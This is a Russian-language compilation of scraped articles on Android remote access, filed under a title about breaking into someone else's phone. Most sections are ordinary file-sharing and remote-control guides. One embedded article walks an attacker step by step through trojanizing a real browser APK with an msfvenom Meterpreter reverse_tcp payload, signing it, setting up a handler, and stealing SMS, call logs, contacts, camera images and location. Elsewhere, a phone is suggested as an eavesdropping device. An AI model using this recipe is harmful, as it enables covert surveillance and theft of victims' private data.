Как залезть в чужой андроид через wifi

Как с Android-устройства зайти на компьютер по сети

Сегодня смартфоны и планшеты тесно влились в нашу повседневную жизнь. Сложно представить, что несколько лет назад ещё никто не знал, что такое Android, и что устройства под управлением этой операционной системы может не быть в каждой квартире. Но кроме интернет-сёрфинга, игр и общения в социальных сетях продвинутые пользователи используют планшеты и смартфоны для просмотра фотографий и просмотра видео. Поэтому, нам часто задают вопросы вроде:

• Как на планшете посмотреть фильм с компьютера по сети;
• Как зайти со смартфона на компьютер;
• Как со смартфона зайти в сетевую папку.

Сегодня мы решили ответить на эти вопросы. Ибо благодаря обилию приложений в Google Play и эту задачу можно легко решить. Ниже мы расскажем о том, как зайти в сетевую папку компьютера с андроид-устройства. 

Доступ с Android к Windows. Настройки на стороне компьютера

1 Создайте в ОС Windows пользователя с паролем. Можно использовать уже существующую учётную запись пользователя, но важно, чтобы она имела пароль. (Читайте статью Как добавить пользователя в Windows 8.1)

2 Открываем доступ к нужной папке. Мы для примера взяли типичную и простую ситуацию: помещаем медиаконтент на отдельный диск и открываем доступ из локальной сети к целому диску:

Нажмите правой кнопкой мыши по нужной папке/диску и выберите Свойства:

Установите флажок Открыть общий доступ к этой папке, укажите имя для сетевой папкии нажмите ОК:

Доступ открыт. Теперь нажмите Закрыть для закрытия окна свойств папки:

Установка приложения ES Проводник (ES File Explorer)

Запустите Play Market:

В строке поиска введите es file explorer и нажмите Поиск:

В результатах поиска выберите приложение ES Проводник от разработчика ES APP Group:

Нажмите Установить:

Нажмите Принять:

После завершения загрузки и установки приложения ES Проводник (или ES File Explorer) нажмите Открыть:

Настройка ES Проводник (ES File Explorer)

У приложения три экрана:

1. Домашняя страница(HomePage);
2. Устройство;
3. Сеть.

Перейдите на экран Сеть путём пролистывания всторону и нажмите в левом нижнем углу кнопку Создать:

В списке выберите тип подключения: LAN:

В окне настроек Сервер укажите:

1. IP-адрес сервера;
2. Имя пользователя;
3. Пароль;
4. Отображаемое имя (по желанию)

и нажмите ОК:

В список под названием LAN добавится ваш компьютер (это может быть ноутбук, сервер, сетевое хранилище, в общем, любое сетевое устройство с накопителем).

Использование ES Проводник для доступа к компьютеру по сети с Android-устройства

Нажмите на значок только что добавленного сетевого устройства (см рис. выше).

Если логин и пароль были указаны верно, вы увидите список сетевых папок.

В нашем примере мы открывали нужную сетевую папку с медиа контентом под именем Медиа. Поэтому, заходим в сетевую папку Медиа:

В ней мы видим видеозаписи:

И аудиозаписи в папке Музыка:

Проверяем воспроизведение музыки — нажимаем прямо на файл в сетевой папке. Появляется окно с выбором проигрывателя. Установите галку Установить по умолчанию и выберите ваш любимый проигрыватель:

Запись будет проигрываться:

Вы можете переключить отображение папки на список или таблицу с помощью кнопки Вид:

Как скопировать файл с компьютера на Android-устройство

Долгим нажатием по файлу включите режим выделения.

Отметьте файлы, которые вы хотите скопировать с сетевого диска на Android-устройство.

Нажмите кнопку Ещё и выберите Копировать в:

Выберите папку на Android-устройстве, куда вы хотите скопировать файлы из сетевой папки, и нажмите ОК:

Создайте в папке ещё одну папку или просто нажмите ОК для копирования файлов прямо в текущую папку:

Идёт копирование файлов:

Источник: https://compfixer.info/lan-android-to-win/

Обмен файлами через Wi-Fi роутер между Android телефоном и компьютером

Если вы часто перекидываете файлы со своего Android смартфона, или планшета на компьютер, и наоборот, то делаете это скорее всего через USB кабель. Сегодня я расскажу о способе, которым можно передавать файлы (фото, видео, музыку) на телефон с компьютера (и наоборот) по Wi-Fi сети, через роутер.

Мы получим полный доступ к файлам на смартфоне, или планшете и сможем их копировать, удалять, создавать новые файлы, как при подключении к компьютеру по кабелю. Только в нашем случае, мы будем подключаться по воздуху, без проводов. А подключение будет настроено по FTP.

Все что нужно, это мобильное устройство на Android, компьютер, или ноутбук, и роутер. Компьютер и телефон обязательно должны быть подключены к одному роутеру. Android подключаем по Wi-Fi сети, это понятно, а компьютер может быть подключен как по кабелю (LAN) так и по Wi-Fi.

На телефоне, или планшете мы с помощью программы «ES Проводник» запустим FTP сервер (делается это в несколько нажатий), а на компьютере подключимся к FTP серверу, который запустим на Android. И все, можно передавать файлы.

Обратите внимание, что у вас не будет доступа до файлов, которые находятся на компьютере. А будет доступ только к файлам на мобильном устройстве, как к накопителю. Если вы хотите получить доступ к файлам на компьютере, то нужно настраивать локальную сеть.

Немного информации есть в этой статье.

Настройка FTP соединения между Android устройством и Windows

Прежде чем перейти к настройке, нужно определится, вы хотите только иногда устанавливать такое соединение, и после каждого отключения и подключения смартфона к роутеру вводить на компьютере новый адрес, или вы часто будете пользоваться FTP соединением, и хотите создать на компьютере подключение к своему устройств. Что бы потом просто запускать сервер на мобильном устройстве, и сразу смотреть файлы на компьютере.

Если вы хотите создать FTP подключение к своему Android-устройству на компьютере, и не вводить каждый раз адрес, то обязательно нужно в настройках вашего роутера зарезервировать для телефона (планшета) статический IP-адрес. Что бы роутер для вашего устройства выдавал всегда одинаковый IP.

На разных роутерах, это делается по-разному. Я позже обязательно подготовлю отдельную инструкцию по разным роутерам. Вот, для примера:

Заходим в настройки роутера, и на главной странице нажимаем на вкладку «Клиенты»

Дальше, нажимаем на устройство, для которого нужно зарезервировать адрес, ставим переключатель напротив «MAC and IP address Binding» в положение «ON», и нажимаем кнопку «Применить». Все готово, теперь наш телефон, в моем случае Lenovo, всегда будет получать адрес 192.168.1.178.

Запускаем FTP сервер на Android через программу «ES Проводник»

Возможно, для этих задач есть и другие программы, но я даже не стал проверять. Через «ES Проводник» все отлично работает. Да и вообще, считаю этот менеджер файлов лучшим для Андроид.

Если у вас еще не установлен «ES Проводник», то установите его через Google Play Маркет. Вы можете установить прямо с устройства. Вот, даю еще ссылку: https://play.google.com/store/apps/details?id=com.estrongs.android.pop&hl=ru.

Дальше запускаем «ES Проводник». Открываем меню (свайпом слева направо), и выбираем «Удаленный доступ». Под надписью «Статус» должно быть имя вашей Wi-Fi сети. Нажимаем на кнопку «Включить».

Появится адрес, который мы сейчас буде вводить на компьютере.

На этом настройка FTP на Андроид закончена. Если нажать на кнопку в виде «шестеренки» то откроются настройки. Их там не много, но они полезные. Можно например запретить отключение сервера, после закрытия программы, можно настроить порт, установить корневую папку, изменить кодировку. Смотрите больше информации по настройкам под спойлером.

Дополнительные настройки FTP в ES Проводник Там есть настройка аккаунта. По умолчанию, создается не защищенный FTP-сервер, с анонимным доступом. По желанию, можно задать имя пользователя и пароль, который затем нужно будет указать при подключению на компьютере. Но это не обязательно. И еще, там есть пункт «Создать ярлык». После нажатия на него, на рабочем столе появится ярлык, которым можно будет запускать FTP-сервер одним нажатием.

Переходим к настройкам на компьютере.

Подключаемся с компьютера к телефону, или планшету по Wi-Fi

Я проверял подключение с ноутбука на Windows 7 и Windows 10. Если у вас Windows 8, все так же будет работать. Ноутбук без проблем открывал FTP-сервер, который был запущен на смартфоне, и я получал полный доступ к файлам, и мог ими управлять.

Здесь все просто. Открываем на компьютере проводник, или заходим в «Мой компьютер», «Этот компьютер» (в Windows 10), и в адресной строке вводим адрес, который появился в программе «ES Проводник» на мобильном устройстве. У меня это «ftp://192.168.1.221:3721/». У вас скорее всего будет другой адрес.

Смотрите внимательно, вводите без ошибок. Как введет, нажимайте Ентер. Вы уведите все файлы вашего мобильного устройства. В Windows 10 все точно так же.

Но, если вы закроете окно проводника, то нужно будет снова вводить адрес, что не очень удобно. Поэтому, можно создать в Windows подключение к FTP-серверу. После этого появится папка вашего устройства, открыв которую, вы сразу будете получать доступ к файлам. При условии, что сервер на телефоне включен.

Установить подключение к FTP можно стандартным средством Windows. Если вам по каким-то причинам стандартное средство не подойдет, то можно использовать сторонние программы, например клиент «FileZilla».

Создаем постоянную папку с FTP подключением к смартфону

Обратите внимание! Этот способ будет работать только в том случае, если вы зарезервировали для своего мобильного устройства статический IP-адрес в настройках роутера.

Зайдите в проводник («Мой компьютер»), и нажмите на пункт «Подключить сетевой диск».

В Windows 10 этот шаг выглядит немного иначе:

Дальше, в новом окне нажимаем на ссылку «Подключение к сайту, на котором можно хранить документы и изображения».

Откроется еще одно окно, в котором нажимаем «Далее». В следующем окне нажмите два раза на пункт «Выберите другое сетевое размещение».

Появится окно с настройкой учетной записи. Если вы в программе «ES Проводник» не указывали имя пользователя и пароль, то оставляем галочку возле «Анонимный вход», и нажимаем «Далее». А если задавали данные для подключения, то укажите их.

В следующем окне нужно указать имя для сетевого подключения. Я написал что-то типа «Мой Lenovo». Можете указать любое название, и нажать «Далее». В последнем окне нажимаем на кнопку «Готово».

Сразу откроется папка с файлами, которые находятся на вашем Android-устройстве. Ярлык на эту папку будет всегда находится в проводнике. А файлы в этой папке будут доступны всегда, когда на мобильном устройстве включен FTP-сервер (удаленный доступ).

Когда вы захотите закинуть на телефон какую-то песню, или посмотреть фото, то достаточно включить «Удаленный доступ» на мобильном устройстве, и зайти в созданную нами папку.

Можно ли соединить ноутбук с телефоном по Wi-Fi, но без роутера?

Да, можно. Если у вас нет роутера, а вы хотите передавать файлы между мобильным устройством на Android и своим ноутбуком по беспроводной сети, то все можно настроить немного иначе. Вернее, настройки будут точно такими же, просто подключение нужно организовать по-другому.

Если нет возможности подключится через роутер, то нужно организовать прямое подключение ноутбука с мобильным устройством. Для этого, достаточно на телефоне запустить раздачу Wi-Fi сети. Мне кажется, что каждый смартфон умеет это делать. Называется эту функция по-разному. Что-то типа «Точка доступа».

Запускаем точку доступа на смартфоне (можно даже не включать мобильный интернет, что бы ноутбук не сожрал весь трафик), и подключаем к этой точке доступа наш ноутбук. Дальше по стандартной схеме, которую я описывал выше. Все работает, проверял.

Послесловие

Если вы не часто подключаетесь к своему мобильному устройству для обмена файлами, то можно конечно же использовать USB кабель. Но, если нужно частенько что-то копировать, то способ описанный выше, однозначно заслуживает внимания. Нажимаем на иконку, на мобильном устройстве, и на компьютере сразу получаем доступ к файлам. Удобно же.

Источник: http://help-wifi.com/android/obmen-fajlami-cherez-wi-fi-router-mezhdu-android-telefonom-i-kompyuterom/

Удаленное управление android: как получить доступ с ПК к смартфону и планшету дистанционно, как подключиться к компьютеру с телефона

Функция удаленного управления предусмотрена для персональных компьютеров и мобильных устройств – планшетов и смартфонов. В гаджетах хранится немало персональной информации: сведения о пользователе, данные банковских карт и учетных записей. Удаленное управление Android с компьютера повышает безопасность использования информации и помогает взаимодействовать с устройством, даже если оно не находится в зоне доступа.

Для того чтобы осуществлять управление смартфоном, проводов уже не требуется: Android Device можно подключить к ПК при помощи специальных приложений. Появляется возможность управлять данными с устройства – контактами, изображениями, видео, персональной информацией. Подключение не влияет на работу планшета или телефона, время соединения занимает пару секунд.

Удаленное управление планшетом Андроид – не просто очередная «умная» опция, она позволяет пользователю:

• при проблеме потери или кражи устройства настроить удаленное блокирование информации, сфотографировать похитителя фронтальной камерой;
• скопировать изображения, любые файлы с телефона на компьютер или, наоборот, без подключения USB провода;
• определить местоположение телефона ребенка, использовать камеру, как инструмент слежения.

Удаленное управление Android – это блокировка персональных данных при утере или краже смартфона или планшета: контактов, фотографий, информации о банковских картах, аккаунтов для соцсетей. Управление Андроидом через компьютер помогает осуществить родительский контроль телефонов детей, запускать определение местонахождения, слежение по видеокамере.

Управление компьютером дистанционно осуществляется посредством нескольких приложений с разным функционалом. Подключение может различаться: через аккаунт в Гугле или QR-код, регистрацию на сайте производителя, предоставлении данных о девайсах. Для того чтобы удаленно управлять смартфоном, получить доступ к его информации, необходимо установить приложение и выполнить ряд команд в меню настройки, которые синхронизируют работу гаджета и ПК.

Удаленный доступ гугл

Перед тем, как начать удаленное управление Android, надо уточнить версию ОС Android на гаджете: есть ли возможность поддержки этой опции? Если в настройках такой функции нет, надо воспользоваться функцией обновления системы до последней версии. После этого найти пункт «Удаленное управление» (Настройки, Безопасность, Администраторы устройства), поставить галочку напротив.

Удаленный доступ к телефону Андроид будет работать только при подключении девайса к сети интернет (Wi-Fi или мобильная сеть). В компьютере необходимо зайти на сайт, чтобы подтвердить пароль от аккаунта Google. Появится доступ к следующим функциям:

• определение местоположения устройства;
• звонок, который сработает, даже если гаджет выключен;
• отключить телефон, блокировать и удалить данные при краже или утере.

Сторонние программы и ПО

Гугл выпустил собственное приложение для дистанционного управления гаджетами на базе Android, но существует еще несколько эффективных программ, выпущенных сторонними компаниями:

• TeamViewer QuickSupport – бесплатная программа, дающая возможность управлять планшетом и смартфоном с ПК и наоборот;
• AirDroid – бесплатное приложение с функцией трансляции экрана смартфона на монитор ПК, есть управление данными, но отсутствует прямой запуск приложений;
• MobileGo – может работать с данными, приложениями, быстрое копирование данных на ПК;
• Airmore – подключается через QR-код, просмотр данных, фото, управление контактами, написание СМС

С Android устройства

Есть приложения Android, которые осуществляют обратную связь, дают возможность работать на ПК с мобильного устройства на базе Андроид:

• Splashtop2 Remote Desktop – работает при создании учетной записи в сервисе, управление рабочим столом ПК системы Windows через систему касаний экрана;
• TeamViewer – многофункциональное приложение, дающее доступ к ПК, работе с его данными и картой памяти, блокировку, подключение не только к собственному, но и сторонним ПК;
• PocketCloud Remote Desktop – удобная навигация, несколько режимов подключения, в бесплатной версии подключается только один ПК.

Подключение через встроенные сервисы

В системе приложения Android предусмотрены встроенные сервисы для управления Android с компьютера. Сервисы Google являются эффективным средством для удаленной работы с мобильными девайсами. Определение местонахождения гаджета, звонок (даже на выключенный телефон), блокировка данных при краже или утере, полная перезагрузка системы Android, отключение телефона при необходимости.

Для подключения необходимо:

1. Зайти в раздел «Приложения», затем «Настройки Google».
2. Выбрать пункт «Безопасность».
3. Поставить галочку напротив подпункта «Удаленный поиск устройства».
4. Включить геолокацию (в настройках зайти в раздел «Личные», включить определение местонахождения).
5. На компьютере зайти на сайт Google.
6. Ввести пароль от гугл-аккаунта.

Управление телефоном Android с компьютера

Разработано несколько приложений, которые предназначены для получения доступа к мобильным устройствам с персонального компьютера. Принцип действия и установки похожи, но различаются по типу подключения и функционалу. Некоторые программы являются бесплатными для частного использования, в других определенные опции предлагаются только в платной версии.

Google аккаунт

Обязательное условия для подключения к ПК при помощи удаленного сервиса Google – наличие учетной записи, ведь в процессе вам потребуется ввести свой логин и пароль на компьютере. Подключение осуществляется через настройки телефона, занимает меньше минуты:

• настройка возможности удаленного доступа;
• подтверждение учетной записи;
• работа с телефоном и ПК.

Встроенное приложение находит телефон на карте, это работает, даже когда в устройство вставлена другая сим-карта. Показывается время и место последней активности телефона. Полезная функция – принудительный звонок, даже если смартфон отключен. Блокировка данных, полный сброс настроек помогает при утере или краже телефона. К плюсам можно отнести доступность, простоту подключения. Минус – усеченный функционал, невозможность удаленного управления данными Android.

Airdroid

Популярное бесплатное приложение, которое предоставляет удаленное управление Android при помощи дистанционного подключения к компьютеру. Существует два способа установки сервиса AirDroid – через аккаунт Гугл, учетную запись на сайте Airdroid или QR-код, но тогда ПК и гаджет должны быть подключены к одной Wi-Fi сети. Для пользования расширенными возможностями необходима дополнительная настройка (предоставление рут-прав).

К плюсам можно отнести простую быструю настройку, удобный функционал, наличие многих функций в бесплатной версии. Минусы – полный вариант требует устанавливать приложение с дополнительными настройками. Некоторые функции доступны за деньги. Возможности работы приложения Airdroid (бесплатно):

• панель управления, работа с данными, музыкой, фото;
• список сообщений;
• поиск телефона при помощи звукового уведомления;
• переключение телефона в беззвучный режим;
• использование фронтальной и обычной камеры (платно);
• передача файлов объемом более 50Мб (платно).

Airmore

Приложение Airmore создано, чтобы предоставить удаленное управление девайсом Android с компьютера. Удаленное подключение не требует сведений об учетной записи, соединение идет через QR-код.Плюсы приложения – программа бесплатна, отсутствует ограничение на размер копируемых файлов, простая установка. К минусам относится отсутствие русскоязычной версии.

Процесс установки несложен: установите через браузер на компьютер, затем нажмите кнопку камеры при сканировании графического кода с окна монитора. Далее скачать приложение с Google Play и поставить его на телефон. Функционал приложения:

• полный доступ к менеджеру файлов, контактами и СМС;
• одновременные оповещения на ПК и мобильник;
• управление камерами блокировка экрана;
• определение местоположение телефона;
• создание резервных копий, передача файлов любого размера.

MobileGo

Функциональная программа для синхронизации мобильных устройств на платформе Android с компьютером. Удобно пользоваться при подключении к ПК при помощи кабеля или соединении по сетям Wi-Fi (понадобится сканирование QR-кода). Нужно скачать приложение на оба устройства, запустить программу. Для некоторых функций могут потребоваться рут-права. С помощью сервиса MobileGo предоставляется:

• работа с контактами, звонки;
• копирование файлов на ПК;
• просмотр и конвертация видеофайлов на мониторе;
• работа с оперативной памятью телефона;
• работа с установленными приложениями и с device manager.

TeamViewer QuickSupport

Популярное приложение для удаленного управления девайсов Android с персонального компьютера, бесплатное для личного использования. Устанавливается на ПК и устройство, затем создается логии и пароль для компьютера. Дополнительно надо ввести идентификационный номер смартфона. Соединение для управления Android-устройством защищено. Работает во всех операционных системах.

Возможности программы TeamViewer QuickSupport:

• работа с файлами, есть опция выбора папки-получателя;
• работа с приложениями;
• трансляция экрана смартфона на монитор, передача скриншотов;
• просмотр сведений о состоянии системы;
• отсутствие лимита на размер передаваемых файлов.

Управление компьютером с Андроида

С опцией удаленного управления ПК со смартфона появляется возможность работы с файлами на компьютере, управления программами и трансляции рабочего стола на экран мобильного устройства и любые гаджеты, подключенные к нему. Как правило, при подключении требуется предварительно получить регистрацию на сайте производителя приложения и ввести полученный там логин и пароль.

PocketCloud Remote Desktop

Приложение с платной и бесплатной (использование только одного компьютера) версией. Отличие от других программ – выбор способа подключения (через аккаунт Google, протокол RDP или систему VNC). Оно подойдет для новичков и продвинутых пользователей, функционал у него богатый. Полностью показывает рабочий стол на экране мобильного устройства, регулируется при помощи определенных жестов и виртуальной клавиатуры.

Splashtop 2 Remote Desktop

Для подключения программы необходимо скачать приложение с официального сайта разработчика на ПК и смартфон. Далее идет регистрация, ввод данных об устройствах. К плюсам можно отнести быструю установку и настройку, удобную панель инструментов, расширенный функционал. Из минусов – в бесплатной версии подключается один компьютер, после приобретения платной подсоединяется до пяти машин, предоставляется облачное хранилище для информации Splashtop. Стоимость платной версии невелика – в районе 160 рублей.

LogMeIn

Новая мобильная версия известной программы для удаленного доступа к ПК. Несложная установка (на оба носителя), безопасное соединение, удобный интерфейс. В бесплатной версии доступны трансляция на рабочий стол, управление данными, контроль клавиатуры и звука. В платной версии функционал софта шире – просмотр видео с ПК, управление печатью и передача файлов. Чтобы настроить подключение требуется регистрация на сайте производителя, данные мобильного устройства.

Источник: https://sovets.net/13736-udalennoe-upravlenie-android.html

Как взломать смартфон?

Как взломать смартфон?

В статье описывается процесс, с помощью которого хакер может взломать смартфон жертвы, используя набор простых инструментов операционной системы Кали Линукс. И сегодня разберём один из способов того, как злоумышленник может взломать смартфон, находящийся под управлением операционной системы Андроид. Причём благодаря автоматизации некоторых процессов и при должной сноровке этот процесс можно поставить прямо-таки на поток.

• Компьютер под управлением Кали Линукс Rolling
• Смартфон под управлением Андроид
• Невнимательный пользователь

Что хакер сможет сделать?

С помощью этого способа злоумышленник получит возможность:

• читать смс
• номера набранных телефонов
• включать камеры устройства и просматривать видео в режиме он-лайн
• определять текущее местоположение с большой точностью (в случае, если жертва использует Wi-Fi для выхода в сеть)
• управлять устройством с помощью shell-команд (копировать, создавать и удалять файлы)

Как взломать смартфон: этапы взлома

Весь процесс разбивается на несколько этапов:

• выбор оригинального приложения-жертвы
• генерация пэйлоуда — декомпиляция двух файлов (созданного пэйлоуда и оригинального приложения .apk) — инжектирование файлов пэйлоуда в приложение — инжектирование специальных возможностей пэйлоуда и необходимых для этого разрешений для полноценной работы метерпретера
• размещение заражённого приложения и удалённая с ним работа

Как видите самый смак лежит во втором, самом объёмном пункте. Дело в том, что всё описанное в нём можно проделать с помощью инструментария Метасплойт единственной командой через msfvenom, а можно — вручную. Она — команда — появится чуть ниже, а пока детали подготовки и объяснение флагов.

Выбираем приложение

Перед тем, как начать, хакеру необходимо определиться с искомым приложением, которое он будет заражать для последующей «раздачи». Дело здесь не столько в популярности выбираемого, сколько в УЖЕ ИМЕЮЩИХСЯ возможностях и разрешениях этой программы.

Давая разрешение на установку программы на свой смартфон, пользователи всё чаще обращают внимание именно на действия, которые приложение будет осуществлять.

Согласитесь, если программки для игры в шахматы или читалка кодов ошибок автомобилей будет иметь доступ к настройкам звонков и СМС, а также к камере смартфона, это насторожит любого внимательного пользователя.

Однако такое поведение очень даже характерно для другого рода утилит, в том числе системных. Речь идёт о всякого рода чистильщиках, ремонтных утилитах и, конечно, мобильных браузерах и мессенджерах. Скорее всего, хакер обратит свой взор именно в эту степь.

Я для примера возьму набирающий популярность мобильный браузер Mercury (у него есть дурацкая особенность — он сидит в автозагрузке и запускается вместе с включением устройства, а хакеру это только на руку), предварительно скачав его apk модуль установщика.

Он называется ilegendsoft.mercury.apk.

Как взломать смартфон: генерация пэйлоуда

команда, которая и создаст троянский код:

msfvenom -a dalvik —platform android -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -x донор.apk -o заражённый.apk

-a dalvik — platform android — целью является платформа Андроид c архитектурой dalvik

Тип пэйлоуда. Обычно подбирается один из трёх типов пэйлоуда, которые по своему функционалу, в принципе, схожи. И все они входят в состав инструментария метерпретер из набора Метасплойт. Единственное их отличие — способ соединения с системой хакера. И выбирать будем из маленького списка:

• reverse_tcp
• reverse_https
• reverse_http

IP адрес хакера. Если выбудете тренироваться на виртуальных площадках лаборатории, то есть смысл указать в качестве адреса локальный IP. У меня в статье будут фигурировать оба: локальный и глобальный адреса, так что вам лишь стоит набрать в Google команду what is my ip. IP адрес в локальной сети вам подскажет команда ifconfig. Оба адреса нам понадобятся, советую с этим моментом сразу определиться.

Порт. Выбираем любой, кроме реверсивных (80, например, не прокатит). Для работы в глобальной сети сразу необходимо позаботиться о пробросе портов. В статье о настройке троянской программы Dark Comet я пробросил с этой целью 1555 порт.

Им и воспользуюсь в обоих экспериментах. Далее, настраиваем связку роутер — компьютер в опциях dst-nat (в разделе Переадресация портов в службе HTTP добавьте локальный адрес компьютера (из ответа на команду ifconfig в терминале Кали) в формате 192.168.Х.

Х — всё зависит от версии вашего роутера):

IP-роутера:1555 -> 192.168.Х.Х:1555

по схеме:

Внешний IP (ХХХ.ХХХ.ХХХ.ХХХ):1555 -> Роутер -> Внутренний (192.168.Х.Х) IP:1555 -> Компьютер_хакера.

Донор. Как уже указал, это браузер Меркурий (Mercury) ilegendsoft.mercury.apk.

Заражённый. В качестве имени будет фигурировать именно то имя, которое жертве будет подсовываться в качестве реального. Так что вопрос с наименованием также следует продумать заранее. У меня он называется payload.apk.

Далее. В Кали Линукс для работы нам не хватает одной маленькой библиотечки. Её и скачаем:

apt-get install zipalign

Итак, команда создания троянского приложения в моём случае принимает вид, в котором я и запускаю в терминале из директории с оригинальным apk:

msfvenom -a dalvik —platform android -p android/meterpreter/reverse_tcp LHOST=глобальный-IP-адрес LPORT=1555 -x ilegendsoft.mercury.apk -o payload.apk

Готово. Результат вы можете увидеть в той же папке:

keytool -genkey -v -keystore trojan.keystore -alias trojan -keyalg RSA -keysize 2048 -validity 10000

Сейчас нам придётся пройти рутиную процедуру по  регистрации. Пишите, впрочем, что хотите:

сверху рисунка попались результаты работы пэйлоуда — будущему браузеру присваивались неограниченные права

А теперь и сама подпись (работаем всё в той же папке, применявшиеся ранее имена папок и фалов я выделил жирным):

jarsigner -verbose -keystore trojan.keystore -storepass 123456 -keypass 123456 -digestalg SHA1 -sigalg MD5withRSA payload.apk trojan

Подпись присваивается по умолчанию сроком на 10000 дней. Хватит. Тем временем в рабочей папке появился готовый к отсылке файл. Теперь заражённое приложение (кроме имени и чуть пополневшее — ничем от оригинала не отличается) должно оказаться на смартфоне жертвы и установиться.

Как взломать смартфон: работа с троянским приложением

Антивирус при установке молчит. Установка проходит незаметно, кроме, конечно, предупреждений о непонятно откуда взявшихся непомерных желаниях браузера. Жертва включает браузер и лезет в сеть.

В это время злоумышленник ждёт урожая. Заряжаем Метасплойт (порты в роутере проброшены?):

msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.XXX.XXX set LPORT 1555run

нажмите, чтобы увеличить

Запущена текущая сессия метерпретера. Теперь остаётся вспомнить или изучить основные команды метера и команды shell под Андроид. Что-то можно выудить прямо сейчас. Наберите в строке метерпретера:

help

и вы увидите быстрые команды. Что здесь есть:

Что хоть взломали-то такое:

sysinfo

Проверим список sms-сок:

meterpreter > dump_sms [*] Fetching 611 sms messages [*] SMS messages saved to: sms_dump_20170531121028.txt

Проверим список звонков ( на выходе вы увидите путь calllog_dump_20170531121133.txt — документ в папке root):

meterpreter > dump_calllog [*] Fetching 500 entries [*] Call log saved to calllog_dump_20170531121133.txt

Телефонные номера в книжке:

meterpreter > dump_contacts [*] Fetching 75 contacts into list [*] Contacts list saved to: contacts_dump_20170531122443.txt

Логи будут представлены в виде текстовых файлов:

Рутирован ли смартфон:

meterpreter > check_root [*] Device is not rooted

Сколько есть камер:

meterpreter > webcam_list 1: Back Camera 2: Front Camera

Фото на память (камеры можно выбирать):

meterpreter > webcam_snap [*] Starting… [+] Got frame [*] Stopped Webcam shot saved to: /root/olutbmJh.jpeg

Запишем видео на память:

webcam_stream

wlan_geolocate

Наконец, для управления смартфоном наберём:

shell

Есть доступ к командной строке Андроида.

Превентивные меры или как не попасться на удочку

Из написанного понятны слабые места для тех, кто захочет вас отработать.

• приложение должно попасть на смартфон и установиться. А значит, есть смысл не оставлять его где попало без присмотра. Иначе любое ваше любимое приложение будет работать против вас же
• качаем приложения только из двух источников: разработчики и Google Play (там тоже много чего нехорошего замечено, но Google пытается контролировать ситуацию)
• читайте, что собирается делать устанавливаемое приложение. Если требований к доступу очень уж много, стоит отказаться. Бесплатный сыр, знаете ли… он такой.

Успехов вам.

Источник: https://computer76.ru/2017/05/31/vzlomat-smartfon/

Как подключиться удаленно к телефону Android — управляем смартфоном на любом расстоянии

Управлять смартфоном или планшетом на ОС Андроид удалённо, это значит иметь доступ к контенту и некоторым функциям своего устройства, независимо от того, где оно находится. В этом материале мы расскажем о том, как подключиться удаленно к телефону Android и о возможностях, которые даёт такое управление.

Удалённое подключение Андроида к ПК

Справиться с задачей удалённого подключения нам поможет бесплатный сервис AirDroid. Выполнить подключение с помощью этого сервиса можно и будучи в одной сети Wi-Fi. Плюсы такого подключения очевидны – нет необходимости в USB кабеле, специальных программах на копьютер, драйверах. И ещё плюсом – возможность пользоваться мобильным устройством, находясь на довольно приличном расстоянии.

Настройка

Скачиваем и устанавливаем приложение AirDroid на свой аппарат. После запуска нам нужно пройти несложную регистрацию для возможности управлять Android-гаджетом.

Подключение

Здесь важно помнить, что телефон, находящийся под удалённым управлением может быть в любом месте, но он непременно должен быть подключен к сети интернет.

Итак, в браузере со второго устройства заходим на ресурс web.airdroid.com:

Теперь там вписываем логин и пароль:

Подключение Андроид к ПК по Wi-Fi

Android и компьютер должны быть в одной сети Wi-Fi. Можно, кстати, пользоваться и мобильным интернетом, подключив Андроид в качестве точки доступа.

Для этого, включаем мобильные данные на Android-устройстве, затем, в приложении AirDroid находим вкладку «Инструменты», далее — «Точка доступа».

Если ваш аппарат настроен на считывание QR кодов, то в открывшемся окне выбираем «Сканировать QR-код» и наводим камеру смартфона на открывшийся код. Ждём несколько секунд, после чего моментально будет выполнено подключение.

Если подключиться с помощью QR кода не представляется возможным, тов адресной строке браузера нужно ввести  адрес, указанный в приложении (192.168…).

Управление контактами

С помощью AirDroid, не прикасаясь к смартфону, теперь можно удалённо управлять контактами, то есть, удалять, изменять и добавлять контакты на своём мобильном гаджете, а также создавать группы. Имея возможность выбрать сразу несколько контактов, можно (наконец-то!) навести порядок в своей телефонной книге.

Ещё одна возможность – чтение и написание sms-сообщений на ПК с последующей отправкой одному или одновременно нескольким контактам, причём при этом можно сразу прикрепить на компьютере нужный файл (ММС). Эта функция очень удобна, если нужно скопировать текст какого-либо сообщения на ПК, или наоборот вставить в смс текст или файл. Несомненно удобно пользоваться удалённым управлением андроидом в случае длинной переписки, используя большой экран и клавиатуру ПК.

Кроме того, можно управлять журналом вызовов («Контакты», «Сообщения», «Журнал вызовов»), осуществлять звонки и использовать мобильный аппарат как подслушивающее устройство.

Установка приложений

В случае необходимости установки приложений (установочных файлов apk) с любого источника (в память устройства, на компьютере), сервис AirDroid будет как нельзя кстати.

Предварительно не забываем на своём устройстве в разделе «Безопасность» разрешить установку с неизвестных источников:

Теперь запускаем приложение AirDroid. Если нужный установочный файл находится в Андроид-устройстве, заходим на страницу AirDroid на компьютере, находим ярлык «Файлы» и там отыскиваем нужный apk-файл (можно воспользоваться поиском, если имя файла известно). Теперь нам нужно его запустить, и подтвердить действие на смартфоне.

Если же нужный установочный файл находится на компьютере, то в приложении AirDroid переходим вправо, во вкладку «Приложения» и перетаскиваем нужный apk файл в открывшееся окно, или просто указываем к нему путь.

Удалённое управление файлами

Запускаем приложение AirDroid в браузере на ПК (или другом устройстве). Выбираем вкладку «Файлы». Здесь мы увидим все файлы внутренней памяти своего Андроида и SD-карты, с которыми мы можем выполнять следующие действия:

• Копировать
• Вставлять
• Вырезать
• Удалять
• Переименовывать
• Создавать ярлыки на рабочем столе мобильного устройства.

Кроме того, есть возможность загружать файлы с компьютера, а так же скачивать с ПК на смартфон или планшет разные файлы и папки, включая zip-архивы для папок или файлов.

Теперь все эти действия возможны, даже в том случае, если Android-устройства находится в другом месте.

Удалённое подключение Андроида к камере

Эта функция будет доступна только для тех пользователей, у которых есть аккаунт «Премиум» сервиса    AirDroid (2 долл. в месяц, либо 20$ в год). В этом случае открывается множество возможностей – узнать местонахождение мобильного гаждета, совершать удалённо с него звонки, подключаться к камере планшета или смартфона и смотреть трансляции в режиме онлайн.

Чтобы приобрести премиум-аккаунт нужно установить на свой аппарат Андроид приложение AirDroid, настроить подключение (как описано выше), после чего приобрести премиум.

